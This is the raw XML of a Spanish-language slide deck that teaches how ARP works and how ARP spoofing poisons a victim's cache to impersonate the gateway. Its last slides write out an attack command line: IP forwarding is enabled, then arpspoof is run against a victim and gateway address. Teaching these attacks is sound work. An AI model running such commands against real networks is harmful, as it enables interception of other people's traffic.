                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirección                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TipoHW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DirecciónHW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean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</a:rPr>
              <a:t>Máscara    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interfaz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192.168.1.206  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ether   	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	08:00:27:44:f1:23    	C                     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wlp2s0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gateway                  ether   	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	e8:de:27:fb:a6:45     	C                     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wlp2s0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192.168.1.111  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incompleto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)                              			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		wlp2s0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192.168.1.11  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ether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00:24:21:0a:d6:0e   	C                     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wlp2s0</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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es-ES" sz="2800" dirty="0" smtClean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4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d0f7c5ba4f2f2ed16f2a714332633ad5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40335" y="2050828"/>
            <a:ext cx="11797520" cy="640185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image3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40334" y="3178367"/>
            <a:ext cx="11778151" cy="2125151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6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d0f7c5ba4f2f2ed16f2a714332633ad5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7796" y="4016057"/>
            <a:ext cx="11560454" cy="1927542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" y="1584622"/>
            <a:ext cx="121919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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Luego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de este paquete, se espera que este equipo responda con un mensaje (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) con la dirección Ethernet que le corresponde.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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5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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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Cada máquina mantiene una caché con las direcciones IP traducidas para reducir el retardo y la carga. Si no tuviera esta tabla, tendríamos una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tormenta de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Como vimos esta tabla de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) contiene su dirección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y dirección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Esta tabla se encuentra en la memoria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y tiene un temporizador que luego desaparece dicha información.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d0f7c5ba4f2f2ed16f2a714332633ad5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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La explotación de este tipo lo que hace es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enviar paquetes falsos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP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(falsificados, o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spoofed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) a la Ethernet, la finalidad de esto es asociar la dirección MAC del atacante con la dirección IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminado (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) en nuestro caso es la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP 192.168.1.1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498079" y="1482132"/>
            <a:ext cx="9060928" cy="440354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3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d0f7c5ba4f2f2ed16f2a714332633ad5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hace un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, hacia una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, por lo que pasa por el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gateway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por defecto que es la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rgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP 192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, le indica que su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.108</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E8:DE:27:FB:A6:45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="28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AR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AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> escucha la petición le responde indicando que su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.1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y su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08:00:27:97:DE:BD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty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400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0800" y="1417517"/>
            <a:ext cx="121411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La sintaxis básica de los mismos es “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opeador:tèrmino-a-buscar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” (sin más comillas). Al utilizar operadores, debemos tener en cuenta lo siguiente :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No debe haber espacios entre el operador, los dos punto y el término a buscar.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Violar la sintaxis puede producir resultados diferentes a los deseados.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Si el término a buscar va a ser una frase, debemos encerrarla entre comillas.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No todos los operadores puede combinarse con otros.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9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2170572"/>
            <a:ext cx="12191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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> recibe la respuesta del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, pero antes que pueda actualizar su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tabla de ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), ahí donde interviene el atacante para entrar en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acción.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.   Donde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>el atacante le dice al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, que es la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.113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y su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC es 10:f0:05:14:dd:7c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9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373793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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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Lo que hace el atacante es enviar una respuesta falta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP REPLY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envenenando al la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A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11" name="Image8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894099" y="3265339"/>
            <a:ext cx="5900766" cy="284451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6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373793"/>
            <a:ext cx="1219199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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Habilitamos el enrutamiento en GNU/Linux : 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		# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="28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 </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mediante el programa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> que se encuentra dentro del paquete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> realizamos lo siguiente:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i wlp2s0 -t 192.168.1.113 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050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: le indicamos la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>placa de red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de salida del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
